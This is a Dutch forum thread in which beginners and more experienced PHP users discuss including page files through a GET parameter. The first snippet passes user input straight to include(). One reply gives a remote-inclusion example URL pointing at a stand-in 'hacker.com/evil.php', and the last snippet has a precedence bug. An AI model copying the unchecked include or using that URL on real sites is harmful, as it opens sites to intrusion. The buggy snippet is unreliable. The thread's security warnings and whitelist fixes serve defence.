[PHP] Opbouw site, hoe werkt dit?

Pagina: 1
Acties:

Onderwerpen

Acties:
  • 0 Henk 'm!

• cdl
  • Registratie: Mei 2003
  • Laatst online: 25-07 12:05
Beetje gekke titel, maar de vraag 'hoe werkt dit?' slaat eigenlijk meer op een script waar ik niet uitkom. Ik zit namelijk met de volgende vraag.
Voor m'n website wil ik graag de layout (in HTML) in 1 bestand onderbrengen, zodat ik alleen deze hoef aan te passen als ik iets wil veranderen aan de site. Op phpfreakz.nl heb ik deze vraag ook gesteld en kreeg ik de volgende code voorgeschoteld:

PHP:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
    layout boven

<? 
    if($_GET['page']) 
    { 
     if(file_exists($_GET['page'].".php")) 
     { 
      INCLUDE($_GET['page'].".php"); 
     } 
     else 
     { 
      include("404.php"); 
     } 
    } 
    else 
    { 
     INCLUDE("home.php"); 
    } 
    ?>

layout beneden

Aangezien ik verder geen reacties meer gekregen heb op phpfreakz.nl weet ik niet wat er met deze code bedoeld wordt. Moet ik deze code plaatsen in het layout-bestand? Moet ik dan nog iets speciaals toevoegen aan de rest van m'n php bestanden? Hoe moet ik linken naar deze bestanden? Wat betekent if($_GET['page']) ?

Groetjes, Christian

Dat zeg ik!

Acties:
  • 0 Henk 'm!

• faabman
  • Registratie: Januari 2001
  • Laatst online: 08-08-2024
mmm, dit is wel een basic vraag hoor... kijk eens in de verschillende tutorials (bijvoorbeeld op www.php.net)

Op zoek naar een baan als Coldfusion webdeveloper? Mail me!

Acties:
  • 0 Henk 'm!

• Oxi
  • Registratie: September 2001
  • Laatst online: 14-11-2022

Oxi

Ik denk dat je bedoeld wat ik gedaan heb.
ik heb in elke dir waar ietsin komt te staan:
code:
1
<?php require('/volledige/path/naar/main.php'); ?>

Dat is alles wat erin staat. Natuurlijk moet die main.php dan wel bestaan en in feite is dat je hele site.
Ik heb dan in die main.php staan
code:
1
<?php require('body.php'); ?>

body.php pakt hij vanzelf uit de dir waar je index.php staat.

Dus de layout wordt óók een php bestand (niet HTML). Maar zolang je alleen de <?php en ?> om de require heen hebt staan maakt dit niet uit

[ Voor 7% gewijzigd door Oxi op 20-03-2004 21:08 ]

I wouldn't give his troubles to a monkey on a rock

Acties:
  • 0 Henk 'm!

• DataGhost
  • Registratie: Augustus 2003
  • Laatst online: 19-09 21:26

DataGhost

iPL dev

faabman schreef op 20 maart 2004 @ 21:05:
mmm, dit is wel een basic vraag hoor...
inderdaad. hier op GoT wordt er wel enige basiskennis verwacht... dit betekent dus als je met php wilt werken dat je daadwerkelijk zelf php kan coden. als je niet eens weet wat een if statement met een get variabele doet heb jij je boekjes niet gelezen

edit: en we doen elkaar standaard de groeten 8)7

[ Voor 29% gewijzigd door DataGhost op 20-03-2004 21:53 ]

Acties:
  • 0 Henk 'm!

Verwijderd

volgens bij bedoel je zoiets:

code:
1
2
3
4
5
6
7
8
9
<?php
include "layout/top.php";
?>

Body van de site

<?php
include "layout/bottom.php";
?>

In top.asp staat bijvoorbeeld:
code:
1
2
3
4
5
<HTML>
<HEAD>
<TITLE>Dit is mijn website</TITLE>
</HEAD>
<BODY>

en in bottom.asp staat bijvoorbeeld:
code:
1
2
</BODY>
</HTML>

Als je iets wilt veranderen aan de (layout) van de site, hoef je alleen maar top.php of bottom.php te veranderen.

Ik hoop dat dit is wat je bedoelt

[ Voor 25% gewijzigd door Verwijderd op 20-03-2004 21:23 . Reden: Vergeten ?> te doen :S ]

Acties:
  • 0 Henk 'm!

• Skaah
  • Registratie: Juni 2001
  • Laatst online: 16-09 18:38
cdl schreef op 20 maart 2004 @ 21:03:
[...]
PHP:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
    layout boven // zet hier <html><head><title>Hallo</title></head><body><h1>welkom</h1>Enzovoort

<? 
    if($_GET['page'])  // als de pagina is aangeroepen met ?page=iets
    { 
     if(file_exists($_GET['page'].".php"))  // als het bestand iets.php bestaat...
     { 
      INCLUDE($_GET['page'].".php");  // voeg iets.php in in het huidige document
     } 
     else 
     { 
      include("404.php"); // als het niet bestaat, toon een 404 (neit gevonden pagina)
     } 
    } 
    else 
    { 
     INCLUDE("home.php"); // als er geen ?page=iets is, toon de homepage.
    } 
    ?>

layout beneden // </body></html>

[...]
if ($_GET['page']) betekent zoiets als: is de pagina aangeroepen met index.php?page=iets?

[ Voor 41% gewijzigd door Skaah op 20-03-2004 21:44 ]

Acties:
  • 0 Henk 'm!

• cdl
dataghost schreef op 20 maart 2004 @ 21:08:
[...]

inderdaad. hier op GoT wordt er wel enige basiskennis verwacht... dit betekent dus als je met php wilt werken dat je daadwerkelijk zelf php kan coden. als je niet eens weet wat een if statement met een get variabele doet heb jij je boekjes niet gelezen

edit: en we doen elkaar standaard de groeten 8)7
Het gekke is dat ik wel het één en ander van PHP weet. Ik heb me echter nooit echt verdiept in het brengen van een systeem. Maar ik ben nog steeds een beginnertje hoor :P
Wel jammer dat de beginners het telkens moeten ontgelden als ze vragen willen stellen op een forum. Zo kunnen we ons nooit ontwikkelen. Maar deze discussie heb ik al vaker gevoerd.

Maar even ontopic, de manier van CyberGuy werkt denk ik ook prima. Toch ben ik benieuwd hoe ik die code met $_get[page] kan toepassen. Kan het misschien zijn dat ik een pagina kan aanroepen met bijvoorbeeld: http://www.domein.nl/index.php?page=gastenboek

Dat zeg ik!

Acties:
  • 0 Henk 'm!

• Skaah
cdl schreef op 20 maart 2004 @ 21:45:
[...]

Het gekke is dat ik wel het één en ander van PHP weet. Ik heb me echter nooit echt verdiept in het brengen van een systeem. Maar ik ben nog steeds een beginnertje hoor :P
Wel jammer dat de beginners het telkens moeten ontgelden als ze vragen willen stellen op een forum. Zo kunnen we ons nooit ontwikkelen. Maar deze discussie heb ik al vaker gevoerd.

Maar even ontopic, de manier van CyberGuy werkt denk ik ook prima. Toch ben ik benieuwd hoe ik die code met $_get[page] kan toepassen. Kan het misschien zijn dat ik een pagina kan aanroepen met bijvoorbeeld: http://www.domein.nl/index.php?page=gastenboek
Ja, deze aanroep zou met de bovenstaande code het bestand gastenboek.php invoegen.

Acties:
  • 0 Henk 'm!

• Grijze Vos
  • Registratie: December 2002
  • Laatst online: 28-02 22:17
Ja, dat kan. De voorbeeldcode gaat dan kijken of gastenboek.php bestaat, en die dan inserten op die plek in de pagina.

Overigens is het $_GET, PHP is case sensitive. Verder is het niet erg als je een beginner bent, maar we gaan hier wel ervan uit dat je zelf documentatie doorleest, dingen als $_GET, if e.d. staan overduidelijk in de manual.

Op zoek naar een nieuwe collega, .NET webdev, voornamelijk productontwikkeling. DM voor meer info

Acties:
  • 0 Henk 'm!

• DataGhost
  • Registratie: Augustus 2003
  • Laatst online: 19-09 21:26

DataGhost

iPL dev

cdl schreef op 20 maart 2004 @ 21:45:
[...]

maar het lijkt mij wel dat zo ongeveer elke tutorial $_GET en $_POST als basis stuff afhandelt....
anyway op http://www.php.net is heel veel te vinden, en als je naar http://www.php.net/commando gaat geeft ie je de info erover, of de best bets

Acties:
  • 0 Henk 'm!

• cdl
Grijze Vos schreef op 20 maart 2004 @ 21:49:
Ja, dat kan. De voorbeeldcode gaat dan kijken of gastenboek.php bestaat, en die dan inserten op die plek in de pagina.

Overigens is het $_GET, PHP is case sensitive. Verder is het niet erg als je een beginner bent, maar we gaan hier wel ervan uit dat je zelf documentatie doorleest, dingen als $_GET, if e.d. staan overduidelijk in de manual.
Ja, dat begrijp ik. Maar er worden af en toe termen gebruikt die ik in eerste instantie niet begrijp. Als beginner zijnde weet ik dan ook niet welke zoektermen ik moet gebruiken om op forums te zoeken. Sorry. Dus dan post ik mijn vraag. Geloof me, php.net staat bijna als m'n startpagina ingesteld B)

Dat zeg ik!

Acties:
  • 0 Henk 'm!

• Grijze Vos
http://www.php.net/manual/nl/

Lees tenminste otot en met hoofdstuk 4 eens een keer helemaal door.

Op zoek naar een nieuwe collega, .NET webdev, voornamelijk productontwikkeling. DM voor meer info

Acties:
  • 0 Henk 'm!

• lasermen
  • Registratie: Maart 2002
  • Laatst online: 28-08 15:21
er zit ook wel iets van gevaar in dit type codes:
als de phpsafe niet aanstaat kan iemand door deze code iets van zijn eigen server in jouw website laden en zo achter vanalles komen.
door bijv index.php?bestand=http://hacker.com/evil.php

zo worden eigenlijk te veel php sites gehackt omdat ze deze methode van site opbouw gebruiken.
dus zeur effe bij je hoster voor de phpsafe en dan zal je dit soort gedonder niet krijgen.

p.s. wil je weten of phpsafe aanstaat <? phpinfo(); ?>

Acties:
  • 0 Henk 'm!

• pierre-oord
  • Registratie: April 2002
  • Laatst online: 10-02 23:00
lasermen schreef op 20 maart 2004 @ 22:25:
als de phpsafe niet aanstaat kan iemand door deze code iets van zijn eigen server in jouw website laden en zo achter vanalles komen.

zo worden eigenlijk te veel php sites gehackt omdat ze deze methode van site opbouw gebruiken.
dus zeur effe bij je hoster voor de phpsafe en dan zal je dit soort gedonder niet krijgen.

Ik ben ook maar newb hoor,maar dat if(file_exists($_GET['page'].".php")) kijkt of een php bestand bestaat. Werkt dat toenvallig niet alleen op eigen locatie, of ook op afstand?

Verder gebruik ik dit stukje php, dat is wel veilig, kan geen paperclip tussen komen. Je moet alleen steeds je main page aanpassen, maar dat vind ik nu ook niet zo'n probleem. Ik heb overigens ook wel andere oplossingen gezien die controleren of het op jouw locatie is geloof ik.

PHP:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
<?
#zorgen dat page altijd iets is
if(!isset($_GET['page'])) { 
    $_GET['page'] = "nieuws";
}

switch ($_GET['page']){ 
    CASE "nieuws": 
    include "nieuws.htm"; 
    break;
    CASE "informatie": 
    include "informatie.htm"; 
    break;
    CASE "prijzen": 
    include "prijzen.htm"; 
    break;
    CASE "contact": 
    include "contact.htm"; 
    break;
    CASE "huurders": 
    include "huurders.htm"; 
    break;
    CASE "voorwaarden": 
    include "voorwaarden.htm"; 
    break;
    CASE "login": 
    include "login.htm"; 
    break;
    CASE "aanmelden": 
    include "mail/aanmelden/aanmelden.php"; 
    break;
    CASE "aanmelden2": 
    include "mail/aanmelden/aanmelden.php.OLD"; 
    break;
    default : 
    include "nieuws.htm"; 
    break;
} 
?>

Acties:
  • 0 Henk 'm!

• Noork
  • Niet online
Zijn 2 standaard manieren voor. 1 is om de tekst te includen in het layout bestand. Andere is om header en footer met alle layout op te roepen in tekstbestand.

Acties:
  • 0 Henk 'm!

• MichelVH
  • Registratie: Oktober 2001
  • Laatst online: 16-09 20:54
Waarom niet een array gebruiken?
PHP:
1
2
3
4
5
6
7
8
9
10
$pages = array('nieuws', 'informatie', 'prijzen', 'contact');

if ( in_array($_GET['page'], $pages) )
{
    include($_GET['page'] . '.php');
}
else
{
    include('nieuws.php');
}

[ Voor 87% gewijzigd door MichelVH op 20-03-2004 23:41 . Reden: bekijk bericht is dat andere knopje 8)7 ]

Don't be afraid of the dark, be afraid of what it hides

Acties:
  • 0 Henk 'm!

• cdl

Ik heb m'n eigen Apache-server. Bedankt voor de goede tip. Ga meteen even checken. Is dat toevallig de safe_mode? Die staat bij mij uit.
Het volgende staat bij mij ingesteld:

safe_mode - Off Off
safe_mode_exec_dir - no value no value
safe_mode_gid - Off Off
safe_mode_include_dir - no value no value
sql.safe_mode - Off Off

Volgens mij is het dan handig om al deze aan te zetten.

[ Voor 22% gewijzigd door cdl op 21-03-2004 00:07 ]

Dat zeg ik!

Acties:
  • 0 Henk 'm!

Verwijderd

Je kan ook gewoon voor die $_GET['page'] een ./ zetten, zodat ie alleen vanuit de huidige directory files pakt. zo kan een kwaadwillende gebruiker (wat een mooi woord toch ;)) geen HTTP/FTP links opgeven of terugwalken in directories.

Acties:
  • 0 Henk 'm!

Verwijderd

Verwijderd schreef op 21 maart 2004 @ 11:02:
Je kan ook gewoon voor die $_GET['page'] een ./ zetten, zodat ie alleen vanuit de huidige directory files pakt. zo kan een kwaadwillende gebruiker (wat een mooi woord toch ;)) geen HTTP/FTP links opgeven of terugwalken in directories.
Je zou ook alle http:// en ftp:// links kunnen blocken, maar ik vind dat zelf nog niet veilig genoeg. Wat ik zelf altijd doe als ik iets maak op deze manier (wat sowiso al zelden is) dan zal ik een array gebruiken zoals TheDark hier ook aangaf.

Acties:
  • 0 Henk 'm!

• pierre-oord
  • Registratie: April 2002
  • Laatst online: 10-02 23:00
TheDark schreef op 20 maart 2004 @ 23:39:
Waarom niet een array gebruiken?
PHP:
1
2
3
4
5
6
7
8
9
10
$pages = array('nieuws', 'informatie', 'prijzen', 'contact');

if ( in_array($_GET['page'], $pages) )
{
    include($_GET['page'] . '.php');
}
else
{
    include('nieuws.php');
}
Da's een nette oplossing idd :)

edit:
Ik heb het gelijk maar even aangepast. ALleen geeft php wel een foutmelding als je de pagina oproept zonder iets in page te hebben staan. Ik heb daarom alsnog het stukje
PHP:
1
2
3
if(!isset($_GET['page'])) {     
    $_GET['page'] = "nieuws"; 
}

ervoor gezet :)

[ Voor 37% gewijzigd door pierre-oord op 21-03-2004 14:39 ]

Acties:
  • 0 Henk 'm!

• henkleerssen
  • Registratie: December 2000
  • Niet online

henkleerssen

Your life is as you narrate it

Ik neem aan dat je al gebruik maakt van css?

Acties:
  • 0 Henk 'm!

• drm
  • Registratie: Februari 2001
  • Laatst online: 09-06 13:31

drm

f0pc0dert

pierre-oord:
Ik heb het gelijk maar even aangepast. ALleen geeft php wel een foutmelding als je de pagina oproept zonder iets in page te hebben staan. Ik heb daarom alsnog het stukje
[code=php /]
ervoor gezet :)
Tipje: voeg niet al te veel dingen toe maar pas liever huidige control structures aan.

PHP:
1
2
3
4
5
6
7
if ( isset ($_GET [ 'page' ])  && in_array ($_GET [ 'page' ], $valid_pages) ) {
   $page = $_GET [ 'page' ];
} else {
   $page = 'nieuws';
}

include ( sprintf ( './pages/%s.php', $page ) );

Music is the pleasure the human mind experiences from counting without being aware that it is counting
~ Gottfried Leibniz

Acties:
  • 0 Henk 'm!

• MisterData
  • Registratie: September 2001
  • Laatst online: 29-08 20:29
Misschien is een template-engine iets voor je? Ik heb er zelf eentje geschreven ooit (stackbased) en die voldoet tot op de dag van vandaag nog erg goed :) zie http://www.codebase.nl/index.php/command/viewcode/id/217 :)

Acties:
  • 0 Henk 'm!

• Skaah
MisterData schreef op 21 maart 2004 @ 18:09:
Misschien is een template-engine iets voor je? Ik heb er zelf eentje geschreven ooit (stackbased) en die voldoet tot op de dag van vandaag nog erg goed :) zie http://www.codebase.nl/index.php/command/viewcode/id/217 :)
Waarom gebruik je geen DBAL? Ik heb er zelf eentje geschreven en die voldoet tot op de dag van vandaag erg goed :) zie http://www.codebase.nl/index.php/command/viewcode/id/224 :)

Wat ik probeer te zeggen, misschien is templates nog iets te lastig / ingewikkeld voor de TS, als de TS al moeite heeft met $_GET etc. Leren proggen doe je in stapjes. Niemand begint met objecten, een DBAL, templates en nette code. Je doet alles in stapjes.

[ Voor 9% gewijzigd door Skaah op 21-03-2004 18:16 ]

Acties:
  • 0 Henk 'm!

• cdl
Ik ben 's aan de slag gegaan met het plaatsen van de pagina's in een array. Dit werkt echt prima! Ik wil 'm graag combineren met de ./ van BiGBUDS. Ik krijg dan het volgende:

PHP:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?
    $pages = array('subscribe');
    if(in_array($_GET['pagina'], $pages) )
    { 
     if(file_exists("./".$_GET['pagina'].".php")) 
     { 
      INCLUDE("./".$_GET['pagina'].".php"); 
     } 
     else 
     { 
      include("404.php"); 
     } 
    } 
    else 
    { 
     INCLUDE("home.php"); 
    } 
    ?>

Doe ik het zo goed? Ik krijg iig geen foutmelding.

@henkleersen: HTML en CSS ben ik zeer goed thuis in. PHP is nu de volgende stap :)

Ik denk ook dat die templates op het ogenblik nog niet voor mij weggelegd zijn.

Dat zeg ik!

Acties:
  • 0 Henk 'm!

• Brakkie
  • Registratie: Maart 2001
  • Niet online

Brakkie

blaat

Ik zou ook nog checken of $_GET['pagina'] wel bestaat als je het helemaal netjes wil doen. Anders krijg je een notice over een index die niet bestaat. Maarja, details.

Systeem | Strava

Acties:
  • 0 Henk 'm!

• Eärendil
  • Registratie: Februari 2002
  • Laatst online: 15:34
In plaats van het includen van de content in een index.php zou je ook de header en footer kunnen includen in elk content-bestand, dus bijv.:
PHP:
1
2
3
4
5
6
<?php include('header.php'); ?>

<h1>Voorbeeld</h1>
<p>Hier komt dus de content</p>

<?php include('footer.php'); ?>

Hiermee kan je ook makkelijk de layout veranderen, worden je url's korter, worden je 404's gewoon door de webserver geregeld en heb je geen lastige veiligheidrisico's.

Acties:
  • 0 Henk 'm!

• Grijze Vos
@henkleersen: HTML en CSS ben ik zeer goed thuis in. PHP is nu de volgende stap :)
Niet flamend bedoeld, maar dat is juist een van de misstappen die beginnende PHP programmeurs snel maken. HTML/CSS is geen programmeren. PHP wel. (Er zijn wel programmeurs die PHP liever een script-taal noemen, maar het blijft programmeren.)

De leercurve is niet al te stijl is voor je, maar je moet het zeker niet zien als 'de volgende stap'. Tis meer een zijstraat die je inloopt...

Acties:
  • 0 Henk 'm!

• crisp
  • Registratie: Februari 2000
  • Laatst online: 15:29

crisp

Devver

Pixelated

Layout doen we tegenwoordig toch met CSS? Wat heeft PHP daar mee te maken? ;)

Intentionally left blank

Acties:
  • 0 Henk 'm!

• cdl
crisp schreef op 22 maart 2004 @ 07:25:
Layout doen we tegenwoordig toch met CSS? Wat heeft PHP daar mee te maken? ;)
Zullen we ontopic blijven? ;) :P
Grijze Vos schreef op 22 maart 2004 @ 04:49:
[...]

Niet flamend bedoeld, maar dat is juist een van de misstappen die beginnende PHP programmeurs snel maken. HTML/CSS is geen programmeren. PHP wel. (Er zijn wel programmeurs die PHP liever een script-taal noemen, maar het blijft programmeren.)

De leercurve is niet al te stijl is voor je, maar je moet het zeker niet zien als 'de volgende stap'. Tis meer een zijstraat die je inloopt...
Idd, dat is zo. Maar voor mij persoonlijk is dit wel een stap vooruit omdat ik hiervoor dus dan niet echt aan het scripten was. Die kennis ben ik nu dus wel aan het bijspijkeren.

Ik vind het trouwens jammer dat beginners niet echt op dit forum terecht kunnen met hun vragen. Ik heb namelijk echt wat van jullie reacties opgestoken. Niet alleen over mijn vraag maar ook eventuele andere oplossingen.

[ Voor 74% gewijzigd door cdl op 22-03-2004 09:34 ]

Dat zeg ik!

Acties:
  • 0 Henk 'm!

• DiLDoG
  • Registratie: Oktober 2002
  • Laatst online: 18-09 08:45
nog ff over die array, ik zelf vind dit wel handig:
PHP:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$pages = array(
    'home'          => './home.php',
    'subscribe'     => './subscribe.php',
    'someotherpage' => './bla.php',
    '404'           => './errors/404.php'
    );

if (!isset($_GET['open'])) $_GET['open'] = "home";

if($page = $pages[$_GET['open']] && file_exists($page))
{
    //include_once($page);
    echo($page);
}
else
{
    //include_once($pages['404']);
    echo($pages['404']);
}

en dat je het betreurt dat beginners hier niet echt terrecht kunnen heeft volgens mij een reden. got is een erg groot forum, en de meeste problemen (zoals die van jou) zijn met een beetje inspanning echt wel zelf op te lossen. vooral als je er nog niet zo veel van af weet zijn er echt een heleboel tuts enzo die je kunnen helpen. als iedereen hier van die basic vragen gaat stellen daalt het niveau hier flink. bovendien wordt het een beetje erd druk hier als we een helpdesk worden.

[ Voor 47% gewijzigd door DiLDoG op 22-03-2004 12:28 ]

Pagina: 1